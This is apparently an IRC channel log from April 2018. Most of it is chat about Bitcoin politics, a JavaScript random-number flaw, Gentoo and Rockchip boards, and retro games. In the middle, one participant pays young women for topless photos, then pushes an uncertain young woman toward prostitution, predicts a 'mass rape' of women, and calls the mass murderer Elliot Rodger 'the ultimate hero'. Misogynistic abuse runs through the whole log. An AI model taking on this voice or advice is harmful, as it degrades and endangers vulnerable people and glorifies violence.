yeah, "interesting" indeed. 1796253;1523458553;spyked;anyway, I can see mircea_popescu's point re "but unlike gossipd, this broken implementation exists!". but unlike, say, Bitcoin, which, broken implementations or not, I can understand by going to the sources, this I can't, at least not without getting myself deep into the slime pit. 1796254;1523460533;asciilifeform;spyked: this is where the empire shines, really -- they can always muster the brute ox power to make a 'this at least exists' ersatz. 1796255;1523460546;asciilifeform;speaking of which, apparently AS OF TODAY gentoo portage latest ver DEMANDS gpg2. 1796256;1523460553;asciilifeform;goodbye 'emerge portage'. 1796257;1523460736;BingoBoingo; back when some imbecile went to fake news media rather than coming to qntra, got sent to jail for it, STILL did not admit there exists no media online besides qntra. << AHA the "Reality Winner" http://qntra.net/2017/06/reality-winner-arrested-for-leaking-to-omidyar-and-greenwalds-fake-qntra/ 1796258;1523460848;mircea_popescu;trinque http://p.bvulpes.com/pastes/BZQ0e/?raw=true 1796259;1523460854;mircea_popescu;BingoBoingo ty! 1796260;1523460975;mircea_popescu;http://btcbase.org/log/2018-04-11#1796214 << yes, except for the part where "hashrate is gonna protect you". the whole POINT of taking some of the information OUT of the blockchain is to try and reduce the protection of hashrate, and make everyone dependent on protection by non-hashrate. which is WHY this is usg move against bitcoin. i don't need no stinking fuckwit to "help me", and i don't care why he thinks i do. i know wh 1796261;1523460975;a111;Logged on 2018-04-11 08:11 avgjoe: Basically segwit it could be reprhased as the "i'm a good politician that will enforce the ---good--- policy but to enforce this i'll need to take some of your sovereignty (keys), but bear with me, hashrate is gonna protect you" 1796262;1523460975;mircea_popescu;y he wants me to think i do, it's all in http://trilema.com/2013/fried-chicken/ 1796263;1523461030;mircea_popescu;moreover, the "hashrate" bullshit, besides being false, is also specifically engineered to follow a certain hope of imperial survival, the supposed "network effect", ie http://trilema.com/2013/digging-through-archives-yields-gold/#selection-109.0-113.830 1796264;1523461063;mircea_popescu;the problem for them is that i now have a pill for that, and http://trilema.com/2014/georg-ritter-von-flondor-and-what-his-unhappy-life-can-teach-us/ ie, not taking any fucking prisoners nor negotiating with idiots. so... 1796265;1523461104;mircea_popescu;http://btcbase.org/log/2018-04-11#1796216 << the whole thing is phrased as "asking questions". one can never be in a rabbit hole so deep they can't ask questions. it's not your job to make any determination, so why stress. 1796266;1523461104;a111;Logged on 2018-04-11 10:07 spyked: http://btcbase.org/log/2018-04-11#1796067 <-- grrr, I lack too many includes to engage in a proper discussion on this. and sifting through the papers puts me into a rabbit hole of deeper and deeper includes and, frustratingly, unresolved medicine tactics. and I've wandered through such rabbit holes for the last 4 years. 1796267;1523461171;asciilifeform;meanwhile, hell froze over, a ban on microshit being seriously floated in ru parliament 1796268;1523461185;mircea_popescu;believe it or not. 1796269;1523461229;mircea_popescu;trade wars, dood, the first step of "governments" coming to terms with malthusian shock (also known as "when the ideology of abundance runs ashore on the jagged rocks of reality") 1796270;1523461314;mircea_popescu;http://btcbase.org/log/2018-04-11#1796224 << a, really ? well best of luck to you then! 1796271;1523461314;a111;Logged on 2018-04-11 10:39 shinohai: http://btcbase.org/log/2018-04-11#1796166 <<< I think the time for grace has passed, and if it isn't clear enough already I won't be wasting anymore time participating in Republican affairs since obviously I have nothing else to contribute. I did, in fact, offer to help you add the gribble functions to your bot or share my version of the plugins (Which incidentally, don't require any of the stuff you 1796272;1523461621;mircea_popescu;http://btcbase.org/log/2018-04-11#1796242 << this is a problem of how you phrase your questions. see, the fundamental, and apparently enduring, cockroach here is that you have an "in-control" mental model you won't diverge from, and it is disabling for your mental process in the following way : you judge "you can't contribute" arbitrarily, and damagingly, in the exact sense contemplated in http://trilema.com/2014/a-conceit-or 1796273;1523461621;a111;Logged on 2018-04-11 14:26 spyked: but as it is, I could only ask stupid questions such as "what's wrong with modelling this using petri nets". or any other simpler method. 1796274;1523461621;mircea_popescu;-the-importance-of-blogging/ or http://btcbase.org/log/2017-12-29#1760915 or otherwise in the log. "how can you predict what will be useful TO YOURSELF in a few years ? let alone to others, today or later ?" 1796275;1523461621;a111;Logged on 2017-12-29 21:30 mircea_popescu: here's a problem i perceive phf : you could guess about log(n) of my understanding of various things that interest me on the basis of reading trilema ; i could not guess epsilon of thge say your understanding of sbcl on the basis of reading whatever you provide voluntarily. i could glean it from this kind of interaction, but here's what that means : http://btcbase.org/log/2017-12-29#1760839 1796276;1523461659;mircea_popescu;by forcing an answer to a question you're not in a position to answer ("is this useful y/n") you end up baking incorrectness into your tree, which then can be relied on by further incorrectness coming down the line for support. 1796277;1523461735;mircea_popescu;and the issue repeats with questions, "i don't know what question to ask such that the response puts me in full control of everything" is not a valid mapping for "i don't know what questions to ask". you've seen me n times ask questions ~about the thing~, ie, to allow the thing to be illuminated, irrespective of whether they "help" me to anything. cuz i don't care about myself ~in this sense~. i care about myself in the other 1796278;1523461735;mircea_popescu; sense, the sense whereby the enemy can't rely on freinds within the walls. 1796279;1523461848;mircea_popescu;now, it's evident where this misrepresentation of intellectual process comes from -- the inept notion of caregivers kid should be "responsible". kid shouldn't be nor is responsible in that sense ; if one of my girls sets the house on fire through unforeseen effect of reasonable application of item, she may feel guilty as a residual side effect of the sexual abuse her parents and broader society put her through, but she won't 1796280;1523461848;mircea_popescu;be in trouble. 1796281;1523461923;mircea_popescu;also, if nuclear weapons ended the world in 1970 ~good for them~, and if the supercollider "ended reality" in the 2010s (as various imbeciles proposed as a valid reason "not to do it" all over the oh-so-useful-and-valuable "science press"), GOOD FOR IT. 1796282;1523461966;mircea_popescu;it is not written upon reality that it must endure forever, let it mind it's own fucking affairs and endure if it has the mettle ; nor was any penguin born with a certified license to eternal life. let them learn how to forge and fire cannon or let them get the fuck off the evolutionary tree. 1796283;1523462011;mircea_popescu;and in general, the cockcages are optional, even if misrepresented as mandatory by mommy. 1796284;1523462359;trinque;mircea_popescu: http://p.bvulpes.com/pastes/3baoy/?raw=true 1796285;1523462375;BingoBoingo;The strongest cockcage is the one that lives in the redditard hea 1796286;1523462377;BingoBoingo;d 1796287;1523462417;mircea_popescu;and now i can't fucking find the core reference of this discussion, whether it was on trilema or in the log i don't remember, but it examined how would i have evaluated the eventual utility of $item at early stage, and made the point indeed very well. 1796288;1523462531;mircea_popescu;trinque will do. 1796289;1523462570;BingoBoingo;I am guessing it probably isn't http://trilema.com/2014/what-interests-me-in-a-project/ 1796290;1523462591;mircea_popescu;notrly. that's kinda the problem, lotta good stuff kinda-related, but there was one specific fucking item. 1796291;1523462602;mircea_popescu;i need better indexing, and i don't know how the fuck to make it ;/ 1796292;1523462683;BingoBoingo;Right, even a classic algo strictly Pagerank google whitelisted to the WoT still wouldn't grep with nuance 1796293;1523462836;mircea_popescu;pretty infuriating. 1796294;1523463011;mircea_popescu;http://btcbase.org/log/2017-08-22#1701858 << incidentally, one of the things that made me chuckle to myself, was the usage of empty enciphered packets to heartbeat. 1796295;1523463011;a111;Logged on 2017-08-22 12:07 asciilifeform: the 'noise protocol' link is hilarious -- even features the classic leper's bell of nsa committee , the null-cipher 1796296;1523463049;mircea_popescu;nobody apparently asked "why not send the time ?" 1796297;1523463060;asciilifeform;mircea_popescu: picture if the selector on kalash had a 'fires backwards' position. 1796298;1523463093;mircea_popescu;if such a rifle could be made, the us would have made it. physics got in their way. 1796299;1523463140;mircea_popescu;anyway, there's evidently a pile of very simple and very useful questions to ask. "Why not send the time ?". 1796300;1523463178;BingoBoingo;In other news after spending a Uruguayo/a free night slaying the Inca in bed my mood is not quite so dismal. As long as there's no "want of a nail" cascades alf shouldn't be greeted by Eeyore. This still does nothing to solve the indexing problem. 1796301;1523463200;asciilifeform;well considering that ~whole point~ of heartbl^H^Heat 'feature' is to assist knownplaintextattack... 1796302;1523463209;mircea_popescu;what the fuck do i care "what it all means in the end". let the end fucking care. and how the hell could any process baked in "$the end". imagine if there was a language which required as part of any function call the exit code of the program. wut ?! 1796303;1523463237;mircea_popescu;bake* in 1796304;1523463398;mircea_popescu;(and this is no small matter, the current principal driver of pantsuit popularity among the not-retarded set is exactly this : their dumb mother told them when they were wee kids that they must have the exit code for any function call, and they never examined the idiotic outpour of the useless dumb whore, so there they sit today, unable to act unless some replicant of the original dumb whore whispers in their ear "all is well 1796305;1523463399;mircea_popescu;" so they can put that putative exit code into their function calls and function. what the fuck!) 1796306;1523463509;asciilifeform;'It Is Texas Law That When Two Trains Meet Each Other At A Railroad Crossing, Each Shall Come To A Full Stop, And Neither Shall Proceed Until The Other Has Gone' 1796307;1523463571;mircea_popescu;(and this is also why i pronounced http://trilema.com/2016/the-story-of-elliot-rodger-by-elliot-rodger-adnotated-part-one/ as the ultimate hero : because he, unlike "the smarter" lot of them, actually wanted a girlfriend TO USE HER, not so that his dumb head can finally function, oh, $woman-in-head is here to tell me all will be ok, now i can pour myself a glass of milk whereas before--couldn't. this much is categorical advan 1796308;1523463571;mircea_popescu;cement over the current state of http://btcbase.org/log/2018-04-04#1792978 set) 1796309;1523463571;a111;Logged on 2018-04-04 22:46 mircea_popescu: anyway, since we're reading "slate star codex", ie scott alexander's blog (the pantsuit-annointed official tlp replacement so tlp never actually happened), let's lul together : https://archive.is/Yyblu#selection-1259.852-1259.1460 1796310;1523463618;mircea_popescu;asciilifeform incidentally, that's not even such a bad rule, force escalation. "you got into a mess on your own power, you are forbidden using your own power again until someone else who knows wtf they're doing PUTS YOU IN A DIFFERENT SITUATION". 1796311;1523463627;mircea_popescu;let them be both picked by cranes and moved at great expense. 1796312;1523463636;mircea_popescu;next time they won't fucking do the dumb. 1796313;1523463651;asciilifeform;amusingly enuff, this is approx what actually happens 1796314;1523463659;mircea_popescu;right-o. 1796315;1523463663;asciilifeform;( smoking wreck will be, yes, moved by crane... ) 1796316;1523463720;mircea_popescu;truly exactly how nature works. 1796317;1523463768;mircea_popescu;BingoBoingo doesn't she want titmoney ? 1796318;1523463771;*;asciilifeform fell in luvv with 'sokoban' as a boy, it was ~the~ game, and only many yrs later realized the appeal: so much like in actual life, player spends good % of time in 'yer phucked, whether know it or not, all yer moves are futile' state 1796319;1523463785;mircea_popescu;ehehe. 1796320;1523463808;mircea_popescu;sokoban is actually a great item because it correctly exposes a primitive -- not of "social discouse" or w/e the fuck, an actual item of reality. 1796321;1523463837;mircea_popescu;it's in this sense an important game in a way doom or warcraft 2 or w/e are not. 1796322;1523463873;asciilifeform;hmm wonder if ... 1796323;1523463878;asciilifeform;;;google そこばん 1796324;1523463891;asciilifeform;oh grrr, it was shinohai's bot wasnnit. 1796325;1523463908;mircea_popescu;the translate call ? yeah. 1796326;1523463927;asciilifeform;yea meant to push 'translate'. but both, grr. 1796327;1523463951;mircea_popescu;!!up kittycollector 1796328;1523463952;deedbot;kittycollector voiced for 30 minutes. 1796329;1523463974;mircea_popescu;asciilifeform so what are you beefing over, you got a bot, have it translate. 1796330;1523464109;asciilifeform;when asciilifeform is no longer catastrophically swamped with 9000 horrors, will possibly attempt a general-purpose bot ( ideally with real, rather than googlistic, dictionaries even ) 1796331;1523464127;asciilifeform;but to be fair 'translator' only turned back into open problem a week or so ago. 1796332;1523464128;mircea_popescu;http://btcbase.org/log/2018-04-11#1796253 << if only. bitcoin would fail the exact same tests today. it's built out of windows basically. 1796333;1523464128;a111;Logged on 2018-04-11 14:55 spyked: anyway, I can see mircea_popescu's point re "but unlike gossipd, this broken implementation exists!". but unlike, say, Bitcoin, which, broken implementations or not, I can understand by going to the sources, this I can't, at least not without getting myself deep into the slime pit. 1796334;1523464135;mircea_popescu;!!up heyleeecx 1796335;1523464136;deedbot;heyleeecx voiced for 30 minutes. 1796336;1523464154;heyleeecx;im here to show my tits apparently cx 1796337;1523464164;mircea_popescu;ever did this before ? 1796338;1523464174;heyleeecx;nope 1796339;1523464184;mircea_popescu;e3355c3b 1796340;1523464189;mod6;asciilifeform does have a lot on his plate. maybe one of the newer gentlemen want to try their hand at a bot. 1796341;1523464193;phf;asciilifeform: don't need google translate for that one, can just use btcbase :p 1796342;1523464196;phf;"SO KO BA N" 1796343;1523464210;asciilifeform;phf: i wanted to see what demented crapola google spits out for it 1796344;1523464238;mircea_popescu;"would you like to buy shoes" 1796345;1523464243;asciilifeform;( i dun need the phonetics, i keyed it in on an actual kbd by hand, know how to sound it lol ) 1796346;1523464266;BingoBoingo; BingoBoingo doesn't she want titmoney ? << Maybe? I am inclined to wait until she tires of paying for things to present the opportunity or I get bored. She's español as a single language and does not understand technology. 1796347;1523464281;mircea_popescu;https://www.youtube.com/watch?v=SZYUvD6E5pU << apaprently there's also a platformer 1796348;1523464306;asciilifeform;mircea_popescu: it was actually pretty popular, overshadowed imho undeservedly by the less cerebral tetris 1796349;1523464318;mircea_popescu;what was ? 1796350;1523464323;heyleeecx;!!register http://p.bvulpes.com/pastes/iReW7/?raw=true 1796351;1523464326;deedbot;2FD0EEEC595AE266F3DFDED3BF9FF1C7D1A9EF2E registered as heyleeecx. 1796352;1523464330;asciilifeform;orig sokoban 1796353;1523464336;mircea_popescu;well yes, i had it. 1796354;1523464349;asciilifeform;oh lol ~actual~ platformer, with gravity, ha 1796355;1523464354;mircea_popescu;yes. 1796356;1523464389;mircea_popescu;i never saw the item in youtube above before. 1796357;1523464391;douchebag;mircea_popescu: I told this girl to use an actual wallet this time and not one of those bullshit ones :D 1796358;1523464396;mircea_popescu;ty! 1796359;1523464501;phf;asciilifeform: i'm just making sure the new feature is sufficiently advertised 1796360;1523464546;asciilifeform;http://www.bestoldgames.net/eng/old-games/sokoban.php << the ver i had, back in stone age 1796361;1523464603;phf;the recommended videos for that arcade sokoban reminded me that there used to be a unix bomberman clone, that had multiplayer implemented by connecting to multiple x11 servers and having each window/connection be a separate player. we used to spend nights at moscow state unix room playing that thing on a local lan 1796362;1523464637;asciilifeform;pretty neat 1796363;1523464723;phf;xbomber now sdl bomber, presumably without the multiplayer http://www.linuxmotors.com/SDL_bomber/downloads/ 1796364;1523464736;asciilifeform;next, waylandbomber 1796365;1523464772;*;asciilifeform from that period recalls only 'penguin' or what was it, where you shoot billgates heads. where did THAT evaporate to. 1796366;1523464822;phf;xbill :) 1796367;1523464826;asciilifeform;aaa yes 1796368;1523464848;phf;http://www.xbill.org/ 1796369;1523464859;asciilifeform;ha! i had nfi. 1796370;1523465051;mircea_popescu;phf pretty sure i played that one 1796371;1523465065;asciilifeform;in other noose, google domains begin to be fw'd in ru 1796372;1523465092;asciilifeform;( supposedly. i have not personally tested. ) 1796373;1523465092;mircea_popescu;the bomberman thing i mean 1796374;1523465327;phf;i'm surprised how little mention of it is on the internet. i guess the peculiar multiplayer mode means that it could only be popular in a very few places 1796375;1523465404;phf;and tbf it was rapidly replaced by quake1, once the engine was released in 99. i'm pretty msu had own port going, because the graybeards (i.e. 22 year old grad students) would sometimes patch things overnight when we ran into bugs 1796376;1523465526;heyleeecx;oki gonna write the code now cx 1796377;1523465548;heyleeecx;just hold up for a few 1796378;1523465731;heyleeecx;https://i.imgur.com/76CPCX0.jpg 1796379;1523465758;heyleeecx;I messed up the first time and had to re write it oopsie! 1796380;1523465804;asciilifeform;what happened to the 3's ? 1796381;1523465907;heyleeecx;oh noeeez! i was writing upside down and made an accident 1796382;1523465920;mircea_popescu;lol made an accident 1796383;1523465935;mircea_popescu;!!pay heyleeecx 0.02 1796384;1523465941;deedbot;Get your OTP: http://p.bvulpes.com/pastes/XEeob/?raw=true 1796385;1523465946;mircea_popescu;!!up heyleeecx 1796386;1523465946;deedbot;heyleeecx voiced for 30 minutes. 1796387;1523465952;mircea_popescu;!!rate heyleeecx 1 mades accidents 1796388;1523465956;deedbot;Get your OTP: http://p.bvulpes.com/pastes/XSN3m/?raw=true 1796389;1523465998;mircea_popescu;so what do you make, other than accidents, heyleeecx ? 1796390;1523466077;douchebag;more accidents, it's my life story basically 1796391;1523466106;heyleeecx;i like oragami 1796392;1523466169;douchebag;im just glad i get out of this shithole in less than two months 1796393;1523466216;mircea_popescu;heyleeecx but i mean, do you work ? go to school ? 1796394;1523466341;heyleeecx;not right now im still deciding what I want to do with the rest of my life, it's a LOTTT of pressure thats been bothering me for awhile 1796395;1523466395;heyleeecx;i think psychology would be cool but i dont know if i would be able to handle all of the college stuff 1796396;1523466410;mircea_popescu;um. so how do you eat ? 1796397;1523466467;heyleeecx;i love cooking and trying new foods for myself but i have worked at restaurants before and hated it 1796398;1523466585;mircea_popescu;yes, but if you don't work and if you don't study, how do you obtain the things that you eat. 1796399;1523466589;mircea_popescu;!!up kittycollector 1796400;1523466590;deedbot;kittycollector voiced for 30 minutes. 1796401;1523466663;heyleeecx;i live with my parents right now 1796402;1523466664;kittycollector;Hi mircea_popescu - very sorry I sat down to only a second and ended up falling asleep on the couch 😪 1796403;1523466682;kittycollector;For only* 1796404;1523466704;kittycollector;Sorry phone, I took it this morning if you wanted it still. 1796405;1523466735;kittycollector;https://usercontent.irccloud-cdn.com/file/hKDKTxiZ/image.jpg 1796406;1523466896;mircea_popescu;heyleeecx i see. 1796407;1523466904;mircea_popescu;!!pay kittycollector 0.02 1796408;1523466908;deedbot;Get your OTP: http://p.bvulpes.com/pastes/LtHFW/?raw=true 1796409;1523466963;mircea_popescu;kittycollector do you collect kittens ? 1796410;1523466975;kittycollector;Again I appologize, I didn't mean for it to happen. Have a break at work now. 1796411;1523466988;kittycollector;Lol, no not quite, I have 1. 1796412;1523467015;kittycollector;But would own more if I could, maybe getting a 2nd this summer. 1796413;1523467047;mircea_popescu;i thought it was more of an age-related thing 1796414;1523467060;kittycollector;Growing up we've always had 2, I think they keep each other entertained. 1796415;1523467075;mircea_popescu;that they do. 1796416;1523467080;kittycollector;I could be a crazy cat lady some day, 💯 1796417;1523467095;mircea_popescu;i love you phf, did i mention it recently ? 1796418;1523467099;BingoBoingo;kittycollector: Indoors or outdoors? 1796419;1523467107;kittycollector;Indoors 1796420;1523467112;mircea_popescu;unlike dogs, cats kinda do ok indoors also... 1796421;1523467118;mircea_popescu;kittycollector ever been to turkey ? 1796422;1523467126;BingoBoingo;That they do. 1796423;1523467138;kittycollector;I haven't, seems like its a touchy area at the moment though. 1796424;1523467154;mircea_popescu;i guess. but they have humongous cat culture. 1796425;1523467165;mircea_popescu;i think istanbul is actually the terran capitol of catempire. 1796426;1523467182;kittycollector;I dont foresee myself traveling over there any time soon. 1796427;1523467183;BingoBoingo;The outdoor cats here are too docile. No OG barncats murdering the shit out of nature here. Sure there's some cats, but there's no fear in the local pigeons 1796428;1523467204;kittycollector;I don't think mine could survive outside at this point 1796429;1523467207;mircea_popescu;#nofear 1796430;1523467225;kittycollector;Hes a big baby lol 1796431;1523467311;mircea_popescu;speaking of which, living with parents is not healthy, heyleeecx 1796432;1523467312;kittycollector;So what do you all do? 1796433;1523467325;mircea_popescu;kittycollector try to take over the world! 1796434;1523467334;BingoBoingo;Eh, get him a couple pet hamsters. That'll get the cat healthier. 1796435;1523467339;kittycollector;Pinky & the brain 1796436;1523467395;mircea_popescu;can't see that without thinking of https://www.youtube.com/watch?v=eIu4fP4fOHE 1796437;1523467425;BingoBoingo;Wait, are trying to take over or carve out a safe space to act with impunity? I guess really there isn't a difference. 1796438;1523467453;kittycollector;Lol, same here. That phrase every time 1796439;1523467699;heyleeecx;i want to move but i dont know what to do with my life 1796440;1523467756;BingoBoingo;!!up heyleeecx 1796441;1523467757;deedbot;heyleeecx voiced for 30 minutes. 1796442;1523468108;deedbot;http://qntra.net/2018/04/chinese-customs-agents-deny-entry-to-us-garbage/ << Qntra - Chinese Customs Agents Deny Entry To US Garbage 1796443;1523468930;BingoBoingo;!!up kittycollector 1796444;1523468931;deedbot;kittycollector voiced for 30 minutes. 1796445;1523470598;douchebag;mircea_popescu: 1796446;1523470608;douchebag;I have another girl interested 1796447;1523470612;mircea_popescu;aite 1796448;1523470615;douchebag;but she'll be here in about an hr 1796449;1523470622;douchebag;on her way home right now 1796450;1523470659;mircea_popescu;heyleeecx yes, but the problem is likely that you overvalue yourself. which is why all the " LOTTT of pressure" and bs. 1796451;1523470663;mircea_popescu;run off with the circus or something. 1796452;1523470680;douchebag;dat gypsie life 1796453;1523470766;mircea_popescu;it's hard, you know, middle class parents keep telling girlie she's valuable and important and in charge and whatnot, when none of those are the case. then as adolescence is drawing to an end, all those kited checks of "safety" and "better not have unprotected sex with random people if you're not 100% sure they know your name" come to be paid and well... there's nothing to pay them with. 1796454;1523470811;mircea_popescu;!!up heyleeecx 1796455;1523470811;deedbot;heyleeecx voiced for 30 minutes. 1796456;1523470841;mircea_popescu;heyleeecx think about it : you spent however long, 20 years doing what your parents told you, and what's it got you ? a lot of pressure ? the sad situation where you don't know what to do with yourself ? 1796457;1523470863;mircea_popescu;gotta cut your losses and move on SOMETIME. they were wrong, because stupid&pretentious, forget the whole pile of nonsense and try something else. 1796458;1523470890;heyleeecx;i just dont really have skills that would make me successful i feel 1796459;1523470901;mircea_popescu;why do you have to be "successful" ? 1796460;1523470932;BingoBoingo;Successful's and outcome of doing, and doing is the only way to build skills 1796461;1523470970;heyleeecx;where do I start??? right now I have nothing 1796462;1523471005;mircea_popescu;go to the closest highway, preferably wearing shoes only, and see who wants to give you a ride. that's where you start. where do you want to start ffs. 1796463;1523471036;heyleeecx;i dont think i want to be a prostitute 1796464;1523471053;mircea_popescu;but nobody asked you what you want. your entire problem is you keep positing what you want matters any. 1796465;1523471057;mircea_popescu;it does not matter, at all. 1796466;1523471105;heyleeecx;i want to find something i am good at to find success in life 1796467;1523471110;mircea_popescu;asshole "parents" ie child molesters living a century prior at least had the common decency to create a security plan for their fucktoys. yes they kept the "lady" girlies in a cage their whole life, but then also had an entire system whereby someone would come along and marry them. 1796468;1523471134;mircea_popescu;nowadays, they still do the molestation like then, but they've done away with the golden net. outright fucking obscene. 1796469;1523471208;mircea_popescu;heyleeecx this whole "something i'm good at" is fairytale dust, they took the "prince charming" item and translated it for the "empowered, hear her roar" girly. now you gotta find a prince-charming-thingtodo ? gimme a break. 1796470;1523471217;mircea_popescu;there's no such thing, as there never was such a thing. 1796471;1523471230;heyleeecx;so you are saying just find a good husband? 1796472;1523471255;mircea_popescu;no. i am saying get over yourself, be a truckstop hooker for a few years until the middle class is washed out of your hair, then do what can be done. 1796473;1523471304;BingoBoingo;And in Javascript today: https://lists.linuxfoundation.org/pipermail/bitcoin-dev/2018-April/015873.html 1796474;1523471310;heyleeecx;i dont want to go to jail for being a hooker 1796475;1523471318;mircea_popescu;why not ? 1796476;1523471324;mircea_popescu;at least then you'd know you're in jail. 1796477;1523471337;BingoBoingo;heyleeecx: Plenty of places where it's legal 1796478;1523471352;mircea_popescu;anyway, there's just enough time left before the middle class extinction event that by the time you're coming out, the mass rape of all your sisters that "knew better" would just be getting underway. maybe you can even help one or two. 1796479;1523471380;BingoBoingo;Anyways, fear of going to jail is a sign of already being in jail 1796480;1523471405;mircea_popescu;BingoBoingo pastebin that ? 1796481;1523471440;BingoBoingo;http://p.bvulpes.com/pastes/WGxX0/?raw=true 1796482;1523471442;mircea_popescu;ty 1796483;1523471459;mircea_popescu;heh 1796484;1523471499;BingoBoingo;The lulz are all in that first sentence: "A significant number of past and current cryptocurrency products contain a JavaScript class named SecureRandom(), containing both entropy collection and a PRNG." 1796485;1523471524;mircea_popescu;"* don't take the output of a CSPRNG and pass it through RC4" should have been "don't whiten, fucktard" 1796486;1523471536;asciilifeform;lol, js crypto still exists!? 1796487;1523471543;mircea_popescu;asciilifeform webwallets, yes ? 1796488;1523471573;asciilifeform;mircea_popescu: typical 'gox' is moar of a plain paypal / sslism thing, rather than js 1796489;1523471606;heyleeecx;well thanks for all the advice but i have to run ttyl 1796490;1523471612;mircea_popescu;later. 1796491;1523471652;BingoBoingo;asciilifeform: These are blockchain.info style things where they market "all the crypto happens in your browser window" 1796492;1523471685;mircea_popescu;sometimes i wonder how #trilema actually reads from the other side. "i'm a confused girly with adolescent tits and a pretty smile, did they just tell me to go hang naked by the highway ?!?!" 1796493;1523471715;asciilifeform;BingoBoingo: hey, who am i to complain, the folx who dun feel like paying for 'expensive' FG -- are more than welcome to pay the cost of using js prng etc 1796494;1523471747;mircea_popescu;asciilifeform my thoughts exactly. the swarm of idiots use non-qntra "press", get reality winnings, non-nsa entropy, get etc. 1796495;1523471749;mircea_popescu;let'em. 1796496;1523471769;asciilifeform;stipendi peccatus (tm)(r) 1796497;1523471860;asciilifeform;in other noose, asciilifeform found that FG connects to rockchiptron with 10cent straight cable, sans usb 1796498;1523471874;asciilifeform;( thing has ttl-voltaged serial ports and a ready 5v out ) 1796499;1523471883;BingoBoingo;If someone want's to write up the failure, may be publishable, but I've got no angle for it other than repeating "stop hitting yourself" 1796500;1523471916;BingoBoingo; in other noose, asciilifeform found that FG connects to rockchiptron with 10cent straight cable, sans usb << Rockchip workstation just became a lot more interesting 1796501;1523471933;asciilifeform;BingoBoingo: to be fair, this is true of almost all similar boards on the market 1796502;1523471952;asciilifeform;( e.g. 'allwinner' , 'snapdragon', even broadcom's infamous raspberry ) 1796503;1523471982;BingoBoingo;asciilifeform: But unlike the rest, it managed to pass several rounds of the alf sniff test 1796504;1523471999;mircea_popescu;yeah this is pretty interesting. should prolly fg the set. 1796505;1523472079;asciilifeform;not only sniff test, but , may as well proclaim it here : 1) 6 rockchiptrons are to be installed at pizarro 2) each subscriber gets a clean , asciilifeform-recipe gentoo image to start with 3) 128GB flash by default , upgrades negotiable , talk to ben_vulpes & mod6 4) each machine comes with full kernel src for asciilifeform's custom rockchip kernel recipe 1796506;1523472097;mircea_popescu;and fgs ? 1796507;1523472117;asciilifeform;(4) is perhaps worth expanding on : it is special 'headless' , reclaims the memory that would have been eaten by gpu; also disables keyboard/mouse/HID 1796508;1523472121;mircea_popescu;by now this is an epic machine, are you kidding me, all sussman would have needed to make an ai 1796509;1523472127;mircea_popescu;had sussman known how to make an ai in the first place. 1796510;1523472145;asciilifeform;FG pricing, i am leaving to the biznis genius of ben_vulpes & mod6 currently 1796511;1523472203;asciilifeform;mircea_popescu: i hesitate to say 'epic', it suffers from slower-than-you-probably-used-to disk access , even with very spiffy usb3 flashes , http://btcbase.org/log/2018-04-06#1793523 see also 1796512;1523472203;a111;Logged on 2018-04-06 01:44 asciilifeform: in other noose, ~143MB/s avg. reads , ~33MB/s writes, on samsung usb3 stick ( vs ~20 / 15 on sd prior ) 1796513;1523472216;asciilifeform;but it is a quite usable, inexpensive physically-isolated gentootron. 1796514;1523472231;asciilifeform;with G/s nic, even. 1796515;1523472247;mircea_popescu;sussman never had a mb/s io machine. 1796516;1523472256;asciilifeform;verily 1796517;1523472264;asciilifeform;tho to be fair , sussman also never ran apache. 1796518;1523472280;BingoBoingo;Now we just need a good source for rubidium clocks 1796519;1523472287;mircea_popescu;asciilifeform no rule rockchips gotta run apache. 1796520;1523472290;asciilifeform;troo 1796521;1523472300;asciilifeform;BingoBoingo it can be in the next crate , if you can describe why we need one 1796522;1523472399;mircea_popescu;i suppose i should have used minsky instead, sussman is a) still extant and b) kinda moved away from ai in the idyllic sense towards more practical applications IE SOLD OUT! 1796523;1523472433;BingoBoingo;I see no need at present. I just imagine ways the board could be pimped. Since it lacks rtc clock, why not go for great rtc clock in Rockchip workstation spec. 1796524;1523472444;mircea_popescu;BingoBoingo dude... 1796525;1523472445;asciilifeform;BingoBoingo: it has a rtc , but no battery 1796526;1523472451;BingoBoingo;Ah 1796527;1523472466;asciilifeform;competing boards, some possibly better even , have one ('allwinner' ) 1796528;1523472524;asciilifeform;in principle there's no reason why every single board needs clock, so long as owner is friends with somebody who does have clock, in same rack 1796529;1523472538;mircea_popescu;anyway, anyone wrote a good post mortem for the self-replicating neural network ? i mean, hal 9000 and all that bs, iue fictional retellings. but the actual story ? no interest among the science-fiction set ? 1796530;1523472804;asciilifeform;BingoBoingo: if it had sata option, i could recommend for 'workstation' ; presently would hesitate 1796531;1523472820;asciilifeform;but in principle yes, makes for a ~2003-speed workstation.. 1796532;1523472895;shinohai;While asciilifeform is here on subj of rockchips, is this the type of tablet you referred to a few days prior? https://www.amazon.com/ASUS-C201-Chromebook-Rockchip-Lotus/dp/B01EGBAR4W 1796533;1523472908;asciilifeform;mircea_popescu: what, specifically, means 'self replicating nn' ? 1796534;1523472947;asciilifeform;shinohai: loox like previous version. new one iirc was c101pa . 1796535;1523472967;asciilifeform;how much the chipset differs, i do not know, i have neither one currently , simply no time 1796536;1523472990;asciilifeform;iirc old version had an evil (i.e. non-open-driver'd) nic 1796537;1523472993;shinohai;ah kk, I have opportunity to purchase new equipment ... would like an arm device to gentoo 1796538;1523473007;asciilifeform;shinohai: try the c101pa 1796539;1523473028;mircea_popescu;asciilifeform you recall, the thing that got all the inept "science" press hot and bothered in the 80s, and nosnense such as hal 9000 / space odissey etc (ie, the first iteration of "lesswrong" wankery) was a demonstration by sussman & goode that "you can have artificial brains growing in the same way as real ones", ie, neural networks that algorithmically expand 1796540;1523473039;asciilifeform;shinohai: and in coupla days there will be a ready gentoo image you can try an' download 1796541;1523473042;shinohai;Found those too: https://www.amazon.com/Chromebook-C101PA-DB02-Quad-Core-Lightweight-Touchscreen/dp/B075KFFMZS 1796542;1523473045;mircea_popescu;i was denoting that historical event, cca 1983 iirc 1796543;1523473071;asciilifeform;mircea_popescu: asimov had same in '50s; not mega-modern 1796544;1523473088;asciilifeform;( he had a different paint on it, but otherwise same imho ) 1796545;1523473098;mircea_popescu;obviously, the fiction wank is just the same item cycled. but there was a. .. science-fashionabilia in the 80s. 1796546;1523473111;asciilifeform;shinohai: the box is readily available in shops in usa also. 1796547;1523473154;shinohai;I prefer mail order for stuffs, besides craigslist finds. 1796548;1523473158;asciilifeform;shinohai: you might need a eeprom writer ( with a set of crocodiles ) , possibly 1796549;1523473171;shinohai;I haz eeprom writer 1796550;1523473192;asciilifeform;shinohai: then you'll need only coffee. 1796551;1523473214;shinohai;got the Signstek TL866CS so I assume will work 1796552;1523473220;asciilifeform;shinohai: welcome 